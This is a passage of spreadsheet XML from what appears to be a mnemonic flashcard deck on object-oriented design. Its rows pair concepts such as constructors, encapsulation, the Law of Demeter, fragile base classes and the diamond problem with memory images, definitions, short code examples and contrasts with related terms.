          <t>405</t>
        </is>
      </c>
      <c r="C407" t="inlineStr">
        <is>
          <t>Constructor</t>
        </is>
      </c>
      <c r="D407" t="inlineStr">
        <is>
          <t>A hard-hatted CONSTRUCTION crew swarms every new house the instant it is stamped out, wiring and painting it before anyone is allowed to move in.</t>
        </is>
      </c>
      <c r="E407" t="inlineStr">
        <is>
          <t>Special method that runs at object creation to initialize fields into a valid starting state, e.g. __init__ in Python.</t>
        </is>
      </c>
      <c r="F407" t="inlineStr">
        <is>
          <t>class Dog: / def __init__(self, name): / self.name = name</t>
        </is>
      </c>
      <c r="G407" t="inlineStr">
        <is>
          <t>Python __new__ — __new__ allocates and returns the object; __init__ only initializes an already-created instance.</t>
        </is>
      </c>
      <c r="H407" t="inlineStr">
        <is>
          <t>A birth certificate stamped in the delivery room.</t>
        </is>
      </c>
      <c r="J407" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K407" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" t="n">
        <v>0</v>
      </c>
      <c r="B408" t="inlineStr">
        <is>
          <t>406</t>
        </is>
      </c>
      <c r="C408" t="inlineStr">
        <is>
          <t>this / self</t>
        </is>
      </c>
      <c r="D408" t="inlineStr">
        <is>
          <t>Every method opens by snapping a SELFIE: the first parameter is always a picture of the very object doing the talking.</t>
        </is>
      </c>
      <c r="E408" t="inlineStr">
        <is>
          <t>The implicit reference to the current instance inside a method, used to reach that object's own fields and methods.</t>
        </is>
      </c>
      <c r="F408" t="inlineStr">
        <is>
          <t>def rename(self, n): / self.name = n # this object's field</t>
        </is>
      </c>
      <c r="G408" t="inlineStr">
        <is>
          <t>cls in Python classmethods — cls is the class itself; self is one particular instance.</t>
        </is>
      </c>
      <c r="H408" t="inlineStr">
        <is>
          <t>A name tag reading HELLO, I'M THIS pinned to the object's chest.</t>
        </is>
      </c>
      <c r="J408" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K408" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" t="n">
        <v>0</v>
      </c>
      <c r="B409" t="inlineStr">
        <is>
          <t>407</t>
        </is>
      </c>
      <c r="C409" t="inlineStr">
        <is>
          <t>Static members</t>
        </is>
      </c>
      <c r="D409" t="inlineStr">
        <is>
          <t>One chalkboard nailed above the whole classroom, crackling with STATIC: every student reads the same tally, and one eraser swipe changes it for all.</t>
        </is>
      </c>
      <c r="E409" t="inlineStr">
        <is>
          <t>Fields and methods belonging to the class itself: one shared copy for all instances, usable without creating an object.</t>
        </is>
      </c>
      <c r="F409" t="inlineStr">
        <is>
          <t>class Dog: / species = 'canis' # shared / Dog.species # no instance needed</t>
        </is>
      </c>
      <c r="G409" t="inlineStr">
        <is>
          <t>Instance members — one copy per object; a static member has exactly one copy, on the class.</t>
        </is>
      </c>
      <c r="H409" t="inlineStr">
        <is>
          <t>TV static on the single shared lobby screen.</t>
        </is>
      </c>
      <c r="J409" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K409" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" t="n">
        <v>0</v>
      </c>
      <c r="B410" t="inlineStr">
        <is>
          <t>408</t>
        </is>
      </c>
      <c r="C410" t="inlineStr">
        <is>
          <t>Prototype-based objects</t>
        </is>
      </c>
      <c r="D410" t="inlineStr">
        <is>
          <t>A garage inventor clones his working PROTOTYPE robot; each clone, asked something it cannot do, phones the original up the chain for the answer.</t>
        </is>
      </c>
      <c r="E410" t="inlineStr">
        <is>
          <t>Object model (JavaScript) without classes: objects delegate missing properties to a linked prototype object at lookup time.</t>
        </is>
      </c>
      <c r="F410" t="inlineStr">
        <is>
          <t>let dog = {bark(){return 'woof'}}; / let rex = Object.create(dog); / rex.bark(); // found via prototype chain</t>
        </is>
      </c>
      <c r="G410" t="inlineStr">
        <is>
          <t>Class inheritance — classes fix structure at definition time; prototypes look properties up live along a chain at each access.</t>
        </is>
      </c>
      <c r="H410" t="inlineStr">
        <is>
          <t>A recipe box that defers to grandma's box when a card is missing.</t>
        </is>
      </c>
      <c r="J410" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K410" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" t="n">
        <v>0</v>
      </c>
      <c r="B411" t="inlineStr">
        <is>
          <t>409</t>
        </is>
      </c>
      <c r="C411" t="inlineStr">
        <is>
          <t>Metaclass</t>
        </is>
      </c>
      <c r="D411" t="inlineStr">
        <is>
          <t>A cookie-cutter FACTORY: the machine that stamps out cookie cutters, which in turn stamp cookies. The cutters are its products, not its cookies.</t>
        </is>
      </c>
      <c r="E411" t="inlineStr">
        <is>
          <t>In Python, the class of a class: classes are themselves objects, instances of a metaclass (type) that controls class creation.</t>
        </is>
      </c>
      <c r="F411" t="inlineStr">
        <is>
          <t>type(Dog) # &lt;class 'type'&gt; / class Meta(type): ... / class Dog(metaclass=Meta): ...</t>
        </is>
      </c>
      <c r="G411" t="inlineStr">
        <is>
          <t>Base class — a base class is what a class inherits FROM; a metaclass is what a class is an instance OF.</t>
        </is>
      </c>
      <c r="H411" t="inlineStr">
        <is>
          <t>A mirror facing a mirror.</t>
        </is>
      </c>
      <c r="J411" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K411" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" t="n">
        <v>0</v>
      </c>
      <c r="B412" t="inlineStr">
        <is>
          <t>410</t>
        </is>
      </c>
      <c r="C412" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
      <c r="D412" t="inlineStr">
        <is>
          <t>A space CAPSULE: instruments sealed inside the hull; mission control can only push the few console buttons, never reach in and touch the wiring.</t>
        </is>
      </c>
      <c r="E412" t="inlineStr">
        <is>
          <t>Bundling data with the methods that operate on it and restricting outside access, so state changes only via a controlled interface.</t>
        </is>
      </c>
      <c r="F412" t="inlineStr">
        <is>
          <t>class Account: / def __init__(self): self._balance = 0 / def deposit(self, amt): self._balance += amt</t>
        </is>
      </c>
      <c r="G412" t="inlineStr">
        <is>
          <t>Abstraction — abstraction chooses which concepts to expose; encapsulation enforces the hiding with access control.</t>
        </is>
      </c>
      <c r="H412" t="inlineStr">
        <is>
          <t>A pill capsule with its medicine sealed inside.</t>
        </is>
      </c>
      <c r="J412" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K412" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" t="n">
        <v>0</v>
      </c>
      <c r="B413" t="inlineStr">
        <is>
          <t>411</t>
        </is>
      </c>
      <c r="C413" t="inlineStr">
        <is>
          <t>Information hiding</t>
        </is>
      </c>
      <c r="D413" t="inlineStr">
        <is>
          <t>A magician's locked trick cabinet: the audience only ever sees doves appear (the interface); the false bottom can be rebuilt every night without changing the show.</t>
        </is>
      </c>
      <c r="E413" t="inlineStr">
        <is>
          <t>Parnas's principle: hide design decisions likely to change behind stable interfaces, so internals can change without breaking callers.</t>
        </is>
      </c>
      <c r="F413" t="inlineStr">
        <is>
          <t>module hides 'stored as list vs dict'; / callers only ever use add() and find()</t>
        </is>
      </c>
      <c r="G413" t="inlineStr">
        <is>
          <t>Encapsulation — encapsulation is the language mechanism; information hiding is the design principle about WHICH decisions to conceal.</t>
        </is>
      </c>
      <c r="H413" t="inlineStr">
        <is>
          <t>Witness protection: new identity inside, same case officer outside.</t>
        </is>
      </c>
      <c r="J413" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K413" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" t="n">
        <v>0</v>
      </c>
      <c r="B414" t="inlineStr">
        <is>
          <t>412</t>
        </is>
      </c>
      <c r="C414" t="inlineStr">
        <is>
          <t>Access modifiers</t>
        </is>
      </c>
      <c r="D414" t="inlineStr">
        <is>
          <t>Nightclub wristbands: green (public) roams anywhere, red (private) opens only the owner's back room, yellow (protected) also admits family.</t>
        </is>
      </c>
      <c r="E414" t="inlineStr">
        <is>
          <t>Keywords like public, private, protected that declare who may touch a member: everyone, only the class, or the class plus subclasses.</t>
        </is>
      </c>
      <c r="F414" t="inlineStr">
        <is>
          <t>public int x; / private int y; // class only / protected int z; // + subclasses</t>
        </is>
      </c>
      <c r="G414" t="inlineStr">
        <is>
          <t>Python underscore convention — _name is a courtesy signal, not enforced; true modifiers are compiler-enforced.</t>
        </is>
      </c>
      <c r="H414" t="inlineStr">
        <is>
          <t>Passport visa stamps of differing reach.</t>
        </is>
      </c>
      <c r="J414" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K414" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" t="n">
        <v>0</v>
      </c>
      <c r="B415" t="inlineStr">
        <is>
          <t>413</t>
        </is>
      </c>
      <c r="C415" t="inlineStr">
        <is>
          <t>Class invariant</t>
        </is>
      </c>
      <c r="D415" t="inlineStr">
        <is>
          <t>A tightrope walker's balance bar: each trick (method) may wobble it mid-air, but he must be dead level again before the crowd looks up.</t>
        </is>
      </c>
      <c r="E415" t="inlineStr">
        <is>
          <t>A condition on object state that must hold between all public calls (e.g. balance &gt;= 0); every method must restore it before returning.</t>
        </is>
      </c>
      <c r="F415" t="inlineStr">
        <is>
          <t>def withdraw(self, amt): / assert self._balance - amt &gt;= 0 / self._balance -= amt</t>
        </is>
      </c>
      <c r="G415" t="inlineStr">
        <is>
          <t>Precondition — a precondition binds the caller before ONE call; an invariant binds the object across ALL calls.</t>
        </is>
      </c>
      <c r="H415" t="inlineStr">
        <is>
          <t>A thermostat forever pulling the room back to 21 degrees.</t>
        </is>
      </c>
      <c r="J415" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K415" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" t="n">
        <v>0</v>
      </c>
      <c r="B416" t="inlineStr">
        <is>
          <t>414</t>
        </is>
      </c>
      <c r="C416" t="inlineStr">
        <is>
          <t>Getters/setters debate</t>
        </is>
      </c>
      <c r="D416" t="inlineStr">
        <is>
          <t>A butler who merely relays shouted orders — 'GET the vase! SET the vase!' — the mansion door may as well be wide open. Fire him and ask the house to redecorate itself.</t>
        </is>
      </c>
      <c r="E416" t="inlineStr">
        <is>
          <t>Accessor pairs (getX/setX) guard fields, but mirroring every field defeats encapsulation—prefer behavior-revealing methods.</t>
        </is>
      </c>
      <c r="F416" t="inlineStr">
        <is>
          <t>bad: a.set_balance(a.get_balance()+5) / good: a.deposit(5)</t>
        </is>
      </c>
      <c r="G416" t="inlineStr">
        <is>
          <t>Properties — properties are syntax for accessors; the debate is whether the field should be exposed at all.</t>
        </is>
      </c>
      <c r="H416" t="inlineStr">
        <is>
          <t>A vending machine with a glass front versus a proper menu.</t>
        </is>
      </c>
      <c r="J416" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K416" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" t="n">
        <v>0</v>
      </c>
      <c r="B417" t="inlineStr">
        <is>
          <t>415</t>
        </is>
      </c>
      <c r="C417" t="inlineStr">
        <is>
          <t>Properties (uniform access)</t>
        </is>
      </c>
      <c r="D417" t="inlineStr">
        <is>
          <t>A smart-house wall: you say 'temperature' and it simply answers — you never learn whether it read a dial or computed a forecast. The PROPERTY hides its butler.</t>
        </is>
      </c>
      <c r="E417" t="inlineStr">
        <is>
          <t>Feature exposing computed methods behind attribute syntax, so obj.x can later become logic without changing callers (uniform access).</t>
        </is>
      </c>
      <c r="F417" t="inlineStr">
        <is>
          <t>class Circle: / @property / def area(self): return 3.14159*self.r**2</t>
        </is>
      </c>
      <c r="G417" t="inlineStr">
        <is>
          <t>Getter method — a property keeps plain field syntax (c.area), so an attribute can be upgraded to logic without breaking callers.</t>
        </is>
      </c>
      <c r="H417" t="inlineStr">
        <is>
          <t>A stage-set doorknob that stagehands can rewire to anything.</t>
        </is>
      </c>
      <c r="J417" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K417" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" t="n">
        <v>0</v>
      </c>
      <c r="B418" t="inlineStr">
        <is>
          <t>416</t>
        </is>
      </c>
      <c r="C418" t="inlineStr">
        <is>
          <t>Law of Demeter</t>
        </is>
      </c>
      <c r="D418" t="inlineStr">
        <is>
          <t>The goddess DEMETER hands you grain but slaps your wrist when you reach past her into her granary's granary: one hand-off only, no reaching through.</t>
        </is>
      </c>
      <c r="E418" t="inlineStr">
        <is>
          <t>Talk only to immediate friends: call methods on yourself, your fields, parameters, or objects you create—avoid chains like a.b().c().d().</t>
        </is>
      </c>
      <c r="F418" t="inlineStr">
        <is>
          <t>bad: order.customer.wallet.pay(amt) / good: order.charge(amt)</t>
        </is>
      </c>
      <c r="G418" t="inlineStr">
        <is>
          <t>Tell don't ask — Demeter limits WHO you may talk to; tell-don't-ask limits WHAT you say (commands over queries).</t>
        </is>
      </c>
      <c r="H418" t="inlineStr">
        <is>
          <t>A train wreck of carriages coupled as a.b.c.d.</t>
        </is>
      </c>
      <c r="J418" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K418" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" t="n">
        <v>0</v>
      </c>
      <c r="B419" t="inlineStr">
        <is>
          <t>417</t>
        </is>
      </c>
      <c r="C419" t="inlineStr">
        <is>
          <t>Tell, don't ask</t>
        </is>
      </c>
      <c r="D419" t="inlineStr">
        <is>
          <t>A drill sergeant never asks a recruit 'how are your boots?' and then kneels to tie them himself — he barks 'POLISH YOUR BOOTS' and marches on.</t>
        </is>
      </c>
      <c r="E419" t="inlineStr">
        <is>
          <t>Command objects to do work with their own data instead of querying their state and making the decision outside them.</t>
        </is>
      </c>
      <c r="F419" t="inlineStr">
        <is>
          <t>bad: if a.balance() &gt; amt: a.set_balance(...) / good: a.withdraw(amt)</t>
        </is>
      </c>
      <c r="G419" t="inlineStr">
        <is>
          <t>Law of Demeter — Demeter is about reach (one dot); tell-don't-ask is about pushing decisions into the data's owner.</t>
        </is>
      </c>
      <c r="H419" t="inlineStr">
        <is>
          <t>A thermostat you set versus a thermometer you keep reading.</t>
        </is>
      </c>
      <c r="J419" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K419" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" t="n">
        <v>0</v>
      </c>
      <c r="B420" t="inlineStr">
        <is>
          <t>418</t>
        </is>
      </c>
      <c r="C420" t="inlineStr">
        <is>
          <t>Defensive copying</t>
        </is>
      </c>
      <c r="D420" t="inlineStr">
        <is>
          <t>The museum hands visitors a replica of the crown jewels to fondle; the real crown never leaves the vault, so no greasy fingerprint can reach it.</t>
        </is>
      </c>
      <c r="E420" t="inlineStr">
        <is>
          <t>Return or store copies of mutable internals instead of live references, so outsiders cannot mutate private state behind your back.</t>
        </is>
      </c>
      <c r="F420" t="inlineStr">
        <is>
          <t>def tags(self): / return list(self._tags) # copy, not the list</t>
        </is>
      </c>
      <c r="G420" t="inlineStr">
        <is>
          <t>Immutability — an immutable object needs no copies; defensive copies protect mutable state you must keep.</t>
        </is>
      </c>
      <c r="H420" t="inlineStr">
        <is>
          <t>Handing out photocopies while the original stays in the safe.</t>
        </is>
      </c>
      <c r="J420" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K420" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" t="n">
        <v>0</v>
      </c>
      <c r="B421" t="inlineStr">
        <is>
          <t>419</t>
        </is>
      </c>
      <c r="C421" t="inlineStr">
        <is>
          <t>Encapsulate what varies</t>
        </is>
      </c>
      <c r="D421" t="inlineStr">
        <is>
          <t>A ship's engine room sealed behind one bulkhead door: the crew swaps pistons and rewires chaos inside, while the bridge only ever sees the same brass telegraph handle.</t>
        </is>
      </c>
      <c r="E421" t="inlineStr">
        <is>
          <t>Identify the parts of a design that change and wall them off behind a stable interface, so change stays local instead of rippling.</t>
        </is>
      </c>
      <c r="F421" t="inlineStr">
        <is>
          <t>price() calls TaxPolicy.rate() - swap NYTax for EUTax without touching checkout</t>
        </is>
      </c>
      <c r="G421" t="inlineStr">
        <is>
          <t>vs information hiding (411): same spirit; this is the design HEURISTIC of isolating expected change, 411 the general principle</t>
        </is>
      </c>
      <c r="H421" t="inlineStr">
        <is>
          <t>a costume quick-change booth behind a fixed stage door</t>
        </is>
      </c>
      <c r="J421" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K421" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" t="n">
        <v>0</v>
      </c>
      <c r="B422" t="inlineStr">
        <is>
          <t>420</t>
        </is>
      </c>
      <c r="C422" t="inlineStr">
        <is>
          <t>Inheritance</t>
        </is>
      </c>
      <c r="D422" t="inlineStr">
        <is>
          <t>Reading of the will: the heir walks out wearing grandfather's entire wardrobe — coat, watch, and debts — automatically, tailored or not.</t>
        </is>
      </c>
      <c r="E422" t="inlineStr">
        <is>
          <t>A subclass acquires the fields and methods of a base class, modeling an is-a relationship and enabling reuse.</t>
        </is>
      </c>
      <c r="F422" t="inlineStr">
        <is>
          <t>class Animal: ... / class Dog(Animal): ... # Dog is-an Animal</t>
        </is>
      </c>
      <c r="G422" t="inlineStr">
        <is>
          <t>Composition — inheritance is is-a, fixed at class definition; composition is has-a, swappable at runtime.</t>
        </is>
      </c>
      <c r="H422" t="inlineStr">
        <is>
          <t>A family crest stamped onto every descendant's door.</t>
        </is>
      </c>
      <c r="J422" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K422" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" t="n">
        <v>0</v>
      </c>
      <c r="B423" t="inlineStr">
        <is>
          <t>421</t>
        </is>
      </c>
      <c r="C423" t="inlineStr">
        <is>
          <t>Method overriding</t>
        </is>
      </c>
      <c r="D423" t="inlineStr">
        <is>
          <t>Same nail on the wall, but the kid hangs his own painting OVER the parent's — every visitor to the kid's room now sees only the kid's picture.</t>
        </is>
      </c>
      <c r="E423" t="inlineStr">
        <is>
          <t>A subclass redefines an inherited method with the same signature, so calls on subclass objects run the new version via dynamic dispatch.</t>
        </is>
      </c>
      <c r="F423" t="inlineStr">
        <is>
          <t>class Dog(Animal): / def speak(self): return 'woof' # replaces Animal.speak</t>
        </is>
      </c>
      <c r="G423" t="inlineStr">
        <is>
          <t>Overloading — overriding replaces an inherited method (same signature); overloading adds a sibling with different parameters.</t>
        </is>
      </c>
      <c r="H423" t="inlineStr">
        <is>
          <t>A cover song replacing the original on the setlist.</t>
        </is>
      </c>
      <c r="J423" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K423" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" t="n">
        <v>0</v>
      </c>
      <c r="B424" t="inlineStr">
        <is>
          <t>422</t>
        </is>
      </c>
      <c r="C424" t="inlineStr">
        <is>
          <t>Overriding vs overloading</t>
        </is>
      </c>
      <c r="D424" t="inlineStr">
        <is>
          <t>The OVERLOADED waiter balances five different trays under one name — the kitchen picks a tray by what you ordered (arguments). The OVERRIDING waiter is the new hire who replaces the old chef's dish outright.</t>
        </is>
      </c>
      <c r="E424" t="inlineStr">
        <is>
          <t>Overriding: subclass, same signature, chosen at runtime. Overloading: same name, different parameter lists, chosen at compile time.</t>
        </is>
      </c>
      <c r="F424" t="inlineStr">
        <is>
          <t>add(int,int) vs add(float,float) # overload / Dog.speak replacing Animal.speak # override</t>
        </is>
      </c>
      <c r="G424" t="inlineStr">
        <is>
          <t>Shadowing — shadowing hides a field or static member by name in a subclass, with no dynamic dispatch involved.</t>
        </is>
      </c>
      <c r="H424" t="inlineStr">
        <is>
          <t>Twins answering one name versus a replacement actor.</t>
        </is>
      </c>
      <c r="J424" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K424" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" t="n">
        <v>0</v>
      </c>
      <c r="B425" t="inlineStr">
        <is>
          <t>423</t>
        </is>
      </c>
      <c r="C425" t="inlineStr">
        <is>
          <t>super</t>
        </is>
      </c>
      <c r="D425" t="inlineStr">
        <is>
          <t>The kid chef plates his remix but first yells 'SOUS!' — the parent sous-chef (super) cooks the classic base sauce, then the kid adds his twist on top.</t>
        </is>
      </c>
      <c r="E425" t="inlineStr">
        <is>
          <t>Keyword to call the base class's version of a method from an override, typically to extend rather than fully replace inherited behavior.</t>
        </is>
      </c>
      <c r="F425" t="inlineStr">
        <is>
          <t>def __init__(self, name, breed): / super().__init__(name) / self.breed = breed</t>
        </is>
      </c>
      <c r="G425" t="inlineStr">
        <is>
          <t>self — self dispatches to the most-derived method; super starts lookup at the NEXT class in the MRO above the current one.</t>
        </is>
      </c>
      <c r="H425" t="inlineStr">
        <is>
          <t>Phoning your parents before you sign the lease.</t>
        </is>
      </c>
      <c r="J425" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K425" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" t="n">
        <v>0</v>
      </c>
      <c r="B426" t="inlineStr">
        <is>
          <t>424</t>
        </is>
      </c>
      <c r="C426" t="inlineStr">
        <is>
          <t>Abstract class</t>
        </is>
      </c>
      <c r="D426" t="inlineStr">
        <is>
          <t>A paint-by-numbers canvas: some patches pre-painted (concrete methods), numbered blanks you MUST fill (abstract), and the gallery refuses to hang it unfinished (no instantiation).</t>
        </is>
      </c>
      <c r="E426" t="inlineStr">
        <is>
          <t>A class that cannot be instantiated, declaring abstract methods subclasses must implement while optionally sharing concrete code.</t>
        </is>
      </c>
      <c r="F426" t="inlineStr">
        <is>
          <t>class Shape(ABC): / @abstractmethod / def area(self): ...</t>
        </is>
      </c>
      <c r="G426" t="inlineStr">
        <is>
          <t>Interface — an interface is pure contract with no state; an abstract class can carry fields and partial implementation.</t>
        </is>
      </c>
      <c r="H426" t="inlineStr">
        <is>
          <t>A building skeleton with a few rooms already furnished.</t>
        </is>
      </c>
      <c r="J426" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K426" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" t="n">
        <v>0</v>
      </c>
      <c r="B427" t="inlineStr">
        <is>
          <t>425</t>
        </is>
      </c>
      <c r="C427" t="inlineStr">
        <is>
          <t>Final / sealed classes</t>
        </is>
      </c>
      <c r="D427" t="inlineStr">
        <is>
          <t>A royal letter closed with red wax SEAL and the king's ring: any heir who tries to rewrite a paragraph cracks the wax, and the guards refuse the copy.</t>
        </is>
      </c>
      <c r="E427" t="inlineStr">
        <is>
          <t>Marking a class or method final/sealed forbids subclassing or overriding, locking behavior against modification by inheritors.</t>
        </is>
      </c>
      <c r="F427" t="inlineStr">
        <is>
          <t>final class String {...} // Java / @final # typing hint in Python</t>
        </is>
      </c>
      <c r="G427" t="inlineStr">
        <is>
          <t>private — private hides a member from outsiders; final exposes it but forbids overriding or extension.</t>
        </is>
      </c>
      <c r="H427" t="inlineStr">
        <is>
          <t>A museum piece behind welded glass.</t>
        </is>
      </c>
      <c r="J427" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K427" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" t="n">
        <v>0</v>
      </c>
      <c r="B428" t="inlineStr">
        <is>
          <t>426</t>
        </is>
      </c>
      <c r="C428" t="inlineStr">
        <is>
          <t>Fragile base class</t>
        </is>
      </c>
      <c r="D428" t="inlineStr">
        <is>
          <t>Grandpa quietly reorganizes his toolshed (base class); across town three grandkids' workbenches collapse, because their jigs were bolted to his shelf positions. FRAGILE: handle with care.</t>
        </is>
      </c>
      <c r="E428" t="inlineStr">
        <is>
          <t>Pitfall: safe-looking edits to a base class silently break subclasses that depended on its internal call patterns or invariants.</t>
        </is>
      </c>
      <c r="F428" t="inlineStr">
        <is>
          <t>v1: Base.add_all calls self.add / v2 inlines it; a subclass counting / adds now silently undercounts</t>
        </is>
      </c>
      <c r="G428" t="inlineStr">
        <is>
          <t>Diamond problem — diamond is ambiguity from two parents; fragile base is breakage from changing one parent.</t>
        </is>
      </c>
      <c r="H428" t="inlineStr">
        <is>
          <t>Wiggling the bottom block of a Jenga tower.</t>
        </is>
      </c>
      <c r="J428" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K428" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" t="n">
        <v>0</v>
      </c>
      <c r="B429" t="inlineStr">
        <is>
          <t>427</t>
        </is>
      </c>
      <c r="C429" t="inlineStr">
        <is>
          <t>Diamond problem</t>
        </is>
      </c>
      <c r="D429" t="inlineStr">
        <is>
          <t>A family-reunion photo shaped like a DIAMOND: one grandma on top, two parents at the sides, one kid at the bottom clutching two conflicting heirloom recipes for the same pie.</t>
        </is>
      </c>
      <c r="E429" t="inlineStr">
        <is>
          <t>In multiple inheritance, inheriting one ancestor through two parents makes it ambiguous which inherited version applies.</t>
        </is>
      </c>
      <c r="F429" t="inlineStr">
        <is>
          <t>class B(A): ... / class C(A): ... / class D(B, C): ... # whose method wins?</t>
        </is>
      </c>
      <c r="G429" t="inlineStr">
        <is>
          <t>MRO — the diamond is the ambiguity; C3 linearization (MRO) is Python's deterministic resolution of it.</t>
        </is>
      </c>
      <c r="H429" t="inlineStr">
        <is>
          <t>Two roads forking then merging at one toll booth with two prices.</t>
        </is>
      </c>
      <c r="J429" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K429" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" t="n">
        <v>0</v>
      </c>
      <c r="B430" t="inlineStr">
        <is>
          <t>428</t>
        </is>
      </c>
      <c r="C430" t="inlineStr">
        <is>
          <t>Virtual call in constructor</t>
        </is>
      </c>
      <c r="D430" t="inlineStr">
        <is>
          <t>A house tour scheduled during construction: guests (the override) stride into rooms with no floorboards yet (uninitialized fields) and crash straight through.</t>
        </is>
      </c>
      <c r="E430" t="inlineStr">
        <is>
          <t>Pitfall: calling an overridable method from a constructor runs subclass code before the subclass's fields are initialized.</t>
        </is>
      </c>
      <c r="F430" t="inlineStr">
        <is>
          <t>class Base: / def __init__(self): self.setup() # overridable! / # Sub.setup runs before Sub.__init__ body</t>
        </is>
      </c>
      <c r="G430" t="inlineStr">
        <is>
          <t>Construction order — order says base-before-derived; this pitfall is dispatching INTO the derived part too early.</t>
        </is>
      </c>
      <c r="H430" t="inlineStr">
        <is>
          <t>Handing a newborn the microphone before its voice works.</t>
        </is>
      </c>
      <c r="J430" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K430" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" t="n">
        <v>0</v>
      </c>
      <c r="B431" t="inlineStr">
        <is>
          <t>429</t>
        </is>
      </c>
      <c r="C431" t="inlineStr">
        <is>
          <t>Yo-yo problem</t>
        </is>
      </c>
      <c r="D431" t="inlineStr">
        <is>
          <t>Debugging with a YO-YO strapped to your scroll wheel: read one line, yank up four ancestor files, snap back down, yank up again — your neck aches by lunch.</t>
        </is>
      </c>
      <c r="E431" t="inlineStr">
        <is>
          <t>Deep inheritance forces readers to bounce up and down the class hierarchy to trace a single behavior, like a yo-yo.</t>
        </is>
      </c>
      <c r="F431" t="inlineStr">
        <is>
          <t>Dog.speak -&gt; Canine.speak -&gt; super / -&gt; Mammal._voice -&gt; Animal.sound / (five files to trace one bark)</t>
        </is>
      </c>
      <c r="G431" t="inlineStr">
        <is>
          <t>Fragile base class — fragile base is edits breaking subclasses; yo-yo is the comprehension cost of deep towers.</t>
        </is>
      </c>
      <c r="H431" t="inlineStr">
        <is>
          <t>Climbing a lighthouse staircase to read one plaque per step.</t>
        </is>
      </c>
      <c r="J431" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K431" t="inlineStr">
        <is>
